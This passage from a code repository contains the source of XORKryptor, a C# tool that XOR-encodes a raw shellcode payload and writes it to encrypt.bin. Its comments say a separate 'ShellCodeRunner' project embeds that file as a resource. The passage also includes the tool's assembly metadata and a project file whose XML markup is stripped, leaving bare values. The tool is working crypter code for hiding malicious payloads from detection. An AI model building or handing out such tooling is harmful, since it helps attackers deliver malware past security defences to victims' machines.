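        // NOTE(review): a key passed on the command line ends up in shell history and process
        // listings. Since the default key is hard-coded in both projects anyway, neither form
        // should be considered secret.
        char[] key = args.Length == 2 ? args[1].ToCharArray() : DefaultKey;
        if (key.Length == 0)
        {
            Console.WriteLine("ERROR: The XOR key must not be empty");
            Environment.Exit(1);
        }

        getPayLoad(args[0], key);
    }

    /// <summary>
    /// Encodes the file at <paramref name="bcnPath"/> with the default key (kept for
    /// compatibility with the original single-argument flow).
    /// </summary>
    /// <param name="bcnPath">Path of the unencoded payload file.</param>
    static void getPayLoad(string bcnPath)
    {
        getPayLoad(bcnPath, DefaultKey);
    }

    /// <summary>
    /// Reads <paramref name="bcnPath"/>, XOR-encodes it with <paramref name="key"/> and writes
    /// the result to encrypt.bin in the current directory.
    /// </summary>
    /// <param name="bcnPath">Path of the unencoded payload file.</param>
    /// <param name="key">Non-empty repeating XOR key; every char must be 0x00-0xFF.</param>
    /// <exception cref="ArgumentException">Thrown by <see cref="encrypt"/> for a bad key.</exception>
    static void getPayLoad(string bcnPath, char[] key)
    {
        // Read the bytes from the unencoded payload file into memory
        byte[] uncShell = File.ReadAllBytes(bcnPath);

        // XOR the payload with the key
        byte[] payLoad = encrypt(uncShell, key);

        // Write the encoded payload out; this is the file the runner embeds as a resource
        File.WriteAllBytes(OutputFileName, payLoad);
        Console.WriteLine("Shellcode has been encrypted.");
    }

    /// <summary>
    /// XORs every byte of <paramref name="shellCode"/> with the byte of <paramref name="key"/>
    /// at the same index modulo the key length. Applying it twice with the same key restores
    /// the input, so this is also the decode routine.
    /// </summary>
    /// <param name="shellCode">Input bytes; an empty array yields an empty array.</param>
    /// <param name="key">Non-empty key whose chars must all fit in a byte (0x00-0xFF).</param>
    /// <returns>A new array of the same length as <paramref name="shellCode"/>.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="shellCode"/> is null.</exception>
    /// <exception cref="ArgumentException">The key is null, empty, or has a char above 0xFF.</exception>
    internal static byte[] encrypt(byte[] shellCode, char[] key)
    {
        if (shellCode == null)
        {
            throw new ArgumentNullException("shellCode");
        }
        // An empty key would otherwise index key[0] and throw IndexOutOfRangeException mid-loop.
        if (key == null || key.Length == 0)
        {
            throw new ArgumentException("XOR key must not be empty", "key");
        }
        // Validate up front so a non-Latin-1 key fails with a clear message instead of an
        // OverflowException from Convert.ToByte partway through the output.
        foreach (char c in key)
        {
            if (c > byte.MaxValue)
            {
                throw new ArgumentException("XOR key characters must be in the range 0x00-0xFF", "key");
            }
        }

        byte[] newByte = new byte[shellCode.Length];
        for (int i = 0; i < shellCode.Length; i++)
        {
            // i % key.Length wraps the key, equivalent to the original reset-to-zero counter
            newByte[i] = (byte)(shellCode[i] ^ Convert.ToByte(key[i % key.Length]));
        }
        return newByte;
    }
}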
78 | }
79 |
--------------------------------------------------------------------------------
/XORKryptor/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
[assembly: AssemblyTitle("XORKryptor")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("XORKryptor")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same GUID as this project's entry in ShellCodeRunner.sln.
[assembly: Guid("2f9c3053-077f-45f2-b207-87c3c7b8f054")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both values are pinned here rather than wildcarded, so rebuilds do not change them.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/XORKryptor/XORKryptor.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {2F9C3053-077F-45F2-B207-87C3C7B8F054}
8 | Exe
9 | Properties
10 | ShellCodeRunner
11 | ShellCodeRunner
12 | v4.0
13 | 512
14 | true
15 |
16 | publish\
17 | true
18 | Disk
19 | false
20 | Foreground
21 | 7
22 | Days
23 | false
24 | false
25 | true
26 | 0
27 | 1.0.0.%2a
28 | false
29 | false
30 | true
31 |
32 |
33 | AnyCPU
34 | true
35 | full
36 | false
37 | bin\Debug\
38 | DEBUG;TRACE
39 | prompt
40 | 4
41 | true
42 |
43 |
44 | AnyCPU
45 | pdbonly
46 | true
47 | bin\Release\
48 | TRACE
49 | prompt
50 | 4
51 | true
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 | False
73 | .NET Framework 3.5 SP1
74 | false
75 |
76 |
77 |
78 |
85 |
--------------------------------------------------------------------------------